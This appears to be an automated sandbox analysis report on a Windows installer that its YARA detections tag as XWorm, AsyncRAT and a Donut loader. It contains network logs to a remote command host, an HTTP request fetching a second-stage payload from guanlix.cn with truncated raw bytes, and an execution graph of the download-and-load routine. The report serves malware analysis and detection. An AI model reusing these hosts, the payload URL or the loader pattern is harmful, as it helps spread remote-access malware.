                Jul 2, 2024 19:26:49.478162050 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:49.807771921 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:49.813163996 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:49.818033934 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:52.848174095 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:52.853199005 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:52.879391909 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:52.886152029 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:52.895032883 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:52.900600910 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:52.910583019 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:52.915396929 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.182055950 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.183598995 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:53.188522100 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.435084105 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.439193964 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:53.443977118 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.674089909 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.676343918 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:53.681237936 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:53.681313038 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:53.686358929 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:58.020001888 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:58.025515079 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:58.362422943 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:58.364145041 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:58.369164944 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:01.426286936 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:01.431514025 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:01.760094881 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:01.763123035 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:01.767916918 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:08.363729954 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:08.368566990 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:08.697655916 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:08.700891018 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:08.705897093 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:18.518781900 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:18.566585064 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:18.785665989 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:18.790512085 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:18.801675081 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:18.806636095 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:18.848650932 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:18.853559017 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:18.957613945 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:18.962405920 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.004580021 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.009474039 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.123985052 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.126043081 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.131294966 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.301260948 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.306590080 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.359496117 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.361474037 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.366375923 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.426228046 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.431370974 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.598973036 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.600544930 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.605341911 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.605403900 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.610166073 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.839663982 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:19.844947100 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:19.850025892 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.092832088 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.094815969 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.095561028 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.095606089 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.097083092 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.097124100 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.098078966 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.098118067 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.100728989 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.317029953 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.322261095 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.720752954 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:21.722687960 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:21.727508068 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:24.863821983 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:24.868638992 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:24.879378080 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:24.884130955 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:24.942049980 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:24.946814060 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:24.957470894 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:24.962264061 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.082573891 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.087451935 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.098114014 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.102936983 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.113816977 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.118577003 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.160862923 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.165678024 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.176203966 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.181107998 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.196995974 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.198518038 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.245872021 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.437726021 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.440114975 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.444932938 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.676493883 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.678153992 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.683053970 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.683165073 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.687952995 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.915642023 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.923172951 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.928015947 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:25.935149908 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:25.940073967 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:27.989346027 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:27.994312048 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:28.322792053 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:28.325889111 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:28.330797911 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:33.363954067 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:33.369385004 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:33.697273970 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:33.698760986 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:33.703732967 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:35.692116976 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:35.696856976 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:36.025947094 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:36.031167984 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:36.035933018 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:38.457875967 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:38.462836981 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:38.791779041 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:38.796690941 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:38.801616907 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:39.145569086 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:39.151108027 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:39.481745005 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:39.483690977 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:39.488785982 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:48.531831026 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:48.585284948 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:48.791187048 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:48.796246052 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:49.127213955 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:49.129750967 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:49.134670973 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.176978111 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.182013988 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.270747900 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.275788069 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.285759926 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.290716887 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.532635927 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.534809113 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.540844917 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.754383087 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.756232977 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.761298895 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.991328955 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:51.993124962 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:51.997895956 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:56.427206039 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:56.432564974 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:56.761580944 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:56.763216019 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:56.768172979 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:58.738987923 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:58.744807959 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:59.199240923 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:27:59.201260090 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:27:59.206070900 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:28:02.301711082 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:28:02.306746006 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:28:02.635546923 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:28:02.641410112 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:28:02.647008896 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:28:13.915904045 CEST497087000192.168.2.1059.56.110.103
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 19:24:44.551358938 CEST6205853192.168.2.101.1.1.1
                Jul 2, 2024 19:24:45.021696091 CEST53620581.1.1.1192.168.2.10
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 2, 2024 19:24:44.551358938 CEST192.168.2.101.1.1.10x24a3Standard query (0)guanlix.cnA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 2, 2024 19:24:45.021696091 CEST1.1.1.1192.168.2.100x24a3No error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
                • guanlix.cn:881
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.104970791.208.240.1578817572C:\Users\user\Desktop\103__Installer.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 19:24:45.032059908 CEST94OUTGET /103.ccp HTTP/1.1
                User-Agent: Download
                Host: guanlix.cn:881
                Cache-Control: no-cache
                Jul 2, 2024 19:24:45.979119062 CEST1236INHTTP/1.1 200 OK
                Server: nginx/1.26.1
                Date: Tue, 02 Jul 2024 17:24:29 GMT
                Content-Type: application/octet-stream
                Content-Length: 71938
                Last-Modified: Thu, 13 Jun 2024 01:27:05 GMT
                Connection: keep-alive
                ETag: "666a4ae9-11902"
                Accept-Ranges: bytes
                Data Raw: e8 88 bb 00 00 88 bb 00 00 fb 5d ff e0 ef bf b0 5f 31 b0 bd 8e 81 b3 52 e4 ec 19 18 69 e6 c6 e6 a5 b3 08 46 07 63 45 5b 43 00 00 00 00 59 79 03 8d 8b d8 c6 a7 da 49 b9 0e e8 ce 1a 60 47 d1 60 39 01 b8 41 a0 c0 c2 9d f2 92 9b 3c 89 1f b7 87 78 70 51 26 50 26 83 e6 17 35 09 23 81 06 b9 48 cd 72 66 0d 87 b6 77 0b 0f c2 35 2d 7a 93 7b 5c b8 88 68 74 84 a8 6f 3e 2f 02 82 5e 05 8e 18 33 c3 21 b5 0d 05 21 4d e1 fc d9 d8 fd 89 73 41 1c 94 91 41 ca 77 f0 2d 2b e3 b8 92 0f b3 50 b3 75 35 db 9c e5 c4 a6 ab 7e 6b bb 49 eb 77 17 bb b6 25 e5 f6 41 09 9c 00 0d 50 e8 31 50 38 7e a6 e4 63 e3 1e a1 e1 e7 9f 2a 34 ef 53 d3 36 74 85 bf 46 6c 73 bc 95 6a 26 54 a6 3b 76 73 8c 44 e9 ce 2e 87 19 62 a0 86 44 e3 ee 0d 30 79 1f 37 29 a3 4a f8 46 97 37 33 82 b3 ba 7e b8 60 8c d2 8f 4c d3 6a d9 3d e9 2c 45 01 a1 9a 4b 74 66 f6 bc ef e6 7c 41 4e 94 1f 04 a7 0f ef fb 89 e3 d8 d8 d2 9f a1 6a 54 73 48 27 b4 89 0d 91 3b d9 b6 a0 9e 5c 36 98 41 d7 65 ac 16 0d a3 24 3d 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: ]_1RiFcE[CYyI`G`9A<xpQ&P&5#Hrfw5-z{\hto>/^3!!MsAAw-+Pu5~kIw%AP1P8~c*4S6tFlsj&T;vsD.bD0y7)JF73~`Lj=,EKtf|ANjTsH';\6Ae$=($=V3O ,bfBC=]\HC{}Z(Y'+2jwOa&^^{Rj|"/*}"=jVP)C8h`mlTK#vZl:]}j]]}FuSOSu1R @Rq)6HHX}TOkB$MGqHI(1SG`!t<[AzA?5ufcj6<;;Q^l3.5Nh;XeA~WJnE JU[ldIb[=0f>_mc


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:13:24:42
                Start date:02/07/2024
                Path:C:\Users\user\Desktop\103__Installer.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\103__Installer.exe"
                Imagebase:0xb70000
                File size:249'344 bytes
                MD5 hash:FBA295E75A2C2FD0F205DA0A14B76859
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Target ID:16
                Start time:13:28:05
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096
                Imagebase:0x2b0000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:10.4%
                  Dynamic/Decrypted Code Coverage:11.2%
                  Signature Coverage:2%
                  Total number of Nodes:796
                  Total number of Limit Nodes:79
                  execution_graph 25446 b759d4 25496 b7a940 25446->25496 25448 b759e0 GetStartupInfoW 25449 b759f4 HeapSetInformation 25448->25449 25451 b759ff 25448->25451 25449->25451 25497 b7abd1 HeapCreate 25451->25497 25452 b75a4d 25455 b75a58 25452->25455 25512 b759ab 66 API calls 3 library calls 25452->25512 25513 b798e5 86 API calls 4 library calls 25455->25513 25456 b75a5e 25457 b75a62 25456->25457 25458 b75a6a __RTC_Initialize 25456->25458 25514 b759ab 66 API calls 3 library calls 25457->25514 25498 b7ae2e 73 API calls __calloc_crt 25458->25498 25460 b75a69 25460->25458 25462 b75a77 25463 b75a83 GetCommandLineA 25462->25463 25464 b75a7b 25462->25464 25499 b7ce13 71 API calls 2 library calls 25463->25499 25515 b7b5af 66 API calls 3 library calls 25464->25515 25467 b75a93 25516 b7cd58 86 API calls 3 library calls 25467->25516 25470 b75a9d 25471 b75aa1 25470->25471 25472 b75aa9 25470->25472 25517 b7b5af 66 API calls 3 library calls 25471->25517 25500 b7cae2 85 API calls 7 library calls 25472->25500 25476 b75aae 25477 b75ab2 25476->25477 25478 b75aba 25476->25478 25518 b7b5af 66 API calls 3 library calls 25477->25518 25501 b7b38e 77 API calls 4 library calls 25478->25501 25481 b75ac1 25483 b75ac6 25481->25483 25484 b75acd 25481->25484 25519 b7b5af 66 API calls 3 library calls 25483->25519 25502 b7ca83 85 API calls 2 library calls 25484->25502 25488 b75ad2 25489 b75ad8 25488->25489 25503 b72f22 25488->25503 25489->25488 25492 b75afc 25521 b7b591 66 API calls _doexit 25492->25521 25495 b75b01 _setlocale 25496->25448 25497->25452 25498->25462 25499->25467 25500->25476 25501->25481 25502->25488 25522 b71186 25503->25522 25512->25455 25513->25456 25514->25460 25516->25470 25520 b7b565 66 API calls _doexit 25520->25492 25521->25495 25560 b741ba GetSystemTimeAsFileTime 25522->25560 25524 b71193 25562 b7434a 25524->25562 25526 b7435c 66 API calls _rand 25527 b71199 25526->25527 25527->25526 25528 b711de VirtualAlloc 25527->25528 25529 b72e3d 25528->25529 25530 b72e42 __ftelli64_nolock __EH_prolog 25529->25530 25531 b72e51 InternetOpenA 25530->25531 25532 b72f15 VirtualFree 25531->25532 25533 b72e6f InternetOpenUrlA 25531->25533 25545 b7168b 25532->25545 25534 b72f0c InternetCloseHandle 25533->25534 25535 b72e8c 25533->25535 25534->25532 25592 b72d13 25535->25592 25537 b72ef4 InternetCloseHandle 25613 b72e01 116 API calls std::ios_base::_Ios_base_dtor 25537->25613 25538 b72ea0 25538->25537 25539 b72ed2 InternetReadFile 25538->25539 25541 b72ee7 25538->25541 25602 b725a8 25538->25602 25539->25538 25539->25541 25612 b72c7a 113 API calls Mailbox 25541->25612 25544 b72ef2 25544->25537 25546 b71690 25545->25546 25548 b716ad 25546->25548 25552 b716da 25546->25552 26026 b7437d 104 API calls 7 library calls 25546->26026 25550 b716c2 25548->25550 26027 b7437d 104 API calls 7 library calls 25548->26027 25550->25552 26028 b7437d 104 API calls 7 library calls 25550->26028 25553 b711e1 GetTickCount64 Sleep GetTickCount64 25552->25553 26029 b74424 25553->26029 25556 b7122c VirtualAlloc ReadFile FindCloseChangeNotification 25559 b71283 25556->25559 25557 b74424 99 API calls 25557->25556 25559->25492 25559->25520 25561 b741ea __aulldiv 25560->25561 25561->25524 25565 b7979c 25562->25565 25570 b79723 GetLastError 25565->25570 25567 b797a4 25568 b74354 25567->25568 25585 b7b5af 66 API calls 3 library calls 25567->25585 25568->25527 25586 b795fe TlsGetValue 25570->25586 25573 b79742 25589 b763fd 66 API calls __calloc_crt 25573->25589 25574 b79790 SetLastError 25574->25567 25576 b7974e 25576->25574 25577 b79756 DecodePointer 25576->25577 25578 b7976b 25577->25578 25579 b79787 25578->25579 25580 b7976f 25578->25580 25591 b74452 66 API calls 2 library calls 25579->25591 25590 b7966f 66 API calls 4 library calls 25580->25590 25583 b79777 GetCurrentThreadId 25583->25574 25584 b7978d 25584->25574 25587 b79613 DecodePointer TlsSetValue 25586->25587 25588 b7962e 25586->25588 25587->25588 25588->25573 25588->25574 25589->25576 25590->25583 25591->25584 25593 b72d18 __EH_prolog 25592->25593 25614 b727f8 25593->25614 25597 b72d70 25621 b72468 25597->25621 25600 b72da9 25600->25538 25603 b725ad __EH_prolog 25602->25603 25771 b72202 25603->25771 25606 b725d6 25779 b71bed 67 API calls 25606->25779 25608 b72653 25780 b724d5 67 API calls __EH_prolog 25608->25780 25610 b7265f 25610->25539 25612->25544 25613->25534 25615 b727fd __EH_prolog 25614->25615 25634 b7255f 25615->25634 25618 b71f88 25752 b71ccd 25618->25752 25620 b71f93 25620->25597 25622 b7246d __EH_prolog 25621->25622 25628 b724c0 25622->25628 25767 b7130b EnterCriticalSection LeaveCriticalSection std::locale::facet::_Incref 25622->25767 25624 b724a5 25768 b72344 105 API calls 6 library calls 25624->25768 25626 b724af 25627 b710ee std::ios_base::_Ios_base_dtor 2 API calls 25626->25627 25627->25628 25628->25600 25629 b7153b 25628->25629 25630 b715bd 25629->25630 25632 b71551 25629->25632 25630->25600 25769 b7450c RaiseException 25632->25769 25770 b73c6b 66 API calls std::exception::_Copy_str 25632->25770 25643 b71606 25634->25643 25639 b72596 25641 b725a2 25639->25641 25658 b737af EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::facet::_Incref 25639->25658 25640 b7153b 67 API calls 25640->25639 25641->25618 25644 b7153b 67 API calls 25643->25644 25645 b71639 25644->25645 25659 b7448c 25645->25659 25648 b7164c 25650 b722fd 25648->25650 25651 b72307 __EH_prolog 25650->25651 25701 b71167 25651->25701 25658->25641 25661 b74496 25659->25661 25662 b71640 25661->25662 25667 b744b2 std::exception::exception 25661->25667 25672 b7729e 25661->25672 25689 b7abfe DecodePointer 25661->25689 25662->25648 25671 b710d4 82 API calls 3 library calls 25662->25671 25664 b744f0 25691 b73cf0 66 API calls std::exception::operator= 25664->25691 25666 b744fa 25692 b7450c RaiseException 25666->25692 25667->25664 25690 b765ba 76 API calls __cinit 25667->25690 25670 b7450b 25671->25648 25673 b7731b 25672->25673 25677 b772ac 25672->25677 25699 b7abfe DecodePointer 25673->25699 25675 b77321 25700 b7a8eb 66 API calls __getptd_noexit 25675->25700 25676 b772b7 25676->25677 25693 b7c900 66 API calls __NMSG_WRITE 25676->25693 25694 b7c751 66 API calls 6 library calls 25676->25694 25695 b7b30d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25676->25695 25677->25676 25680 b772da RtlAllocateHeap 25677->25680 25683 b77307 25677->25683 25687 b77305 25677->25687 25696 b7abfe DecodePointer 25677->25696 25680->25677 25681 b77313 25680->25681 25681->25661 25697 b7a8eb 66 API calls __getptd_noexit 25683->25697 25698 b7a8eb 66 API calls __getptd_noexit 25687->25698 25689->25661 25690->25664 25691->25666 25692->25670 25693->25676 25694->25676 25696->25677 25697->25687 25698->25681 25699->25675 25700->25681 25726 b7106a 25701->25726 25704 b71e13 25705 b71e1d __EH_prolog 25704->25705 25706 b73131 std::_Lockit::_Lockit EnterCriticalSection 25705->25706 25707 b71e2c 25706->25707 25741 b71035 25707->25741 25709 b71e43 25721 b71e56 25709->25721 25747 b71b6a 105 API calls 3 library calls 25709->25747 25710 b73159 std::locale::facet::_Incref LeaveCriticalSection 25712 b71eab 25710->25712 25722 b710ee 25712->25722 25713 b71e66 25714 b71e88 25713->25714 25748 b73cd2 66 API calls std::exception::exception 25713->25748 25716 b7106a std::locale::facet::_Incref 2 API calls 25714->25716 25718 b71e98 25716->25718 25717 b71e7a 25749 b7450c RaiseException 25717->25749 25750 b73185 77 API calls std::_Mutex::_Mutex 25718->25750 25721->25710 25723 b710f9 25722->25723 25724 b710f4 25722->25724 25723->25639 25723->25640 25751 b71092 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::facet::_Incref 25724->25751 25731 b73131 25726->25731 25732 b73143 25731->25732 25733 b7107b 25731->25733 25739 b73b66 EnterCriticalSection 25732->25739 25735 b73159 25733->25735 25736 b73160 25735->25736 25737 b7108f 25735->25737 25740 b73b76 LeaveCriticalSection 25736->25740 25737->25704 25739->25733 25740->25737 25742 b71065 25741->25742 25743 b71041 25741->25743 25742->25709 25744 b73131 std::_Lockit::_Lockit EnterCriticalSection 25743->25744 25745 b7104b 25744->25745 25746 b73159 std::locale::facet::_Incref LeaveCriticalSection 25745->25746 25746->25742 25747->25713 25748->25717 25749->25714 25750->25721 25751->25723 25753 b71cd7 __EH_prolog 25752->25753 25760 b73a2c 25753->25760 25756 b7448c std::_Mutex::_Mutex 77 API calls 25757 b71cf7 25756->25757 25759 b71d03 Mailbox 25757->25759 25765 b710d4 82 API calls 3 library calls 25757->25765 25759->25620 25761 b7448c std::_Mutex::_Mutex 77 API calls 25760->25761 25762 b73a38 25761->25762 25766 b73b46 InitializeCriticalSection 25762->25766 25764 b71cec 25764->25756 25765->25759 25766->25764 25767->25624 25768->25626 25769->25632 25770->25632 25773 b72207 __EH_prolog 25771->25773 25772 b7223c 25772->25606 25775 b71830 25772->25775 25773->25772 25781 b71f4f 67 API calls 25773->25781 25776 b718ec 25775->25776 25777 b71849 _memmove 25775->25777 25776->25606 25777->25776 25782 b72964 25777->25782 25779->25608 25780->25610 25781->25772 25783 b72969 Mailbox __EH_prolog 25782->25783 25784 b729c5 25783->25784 25785 b729d9 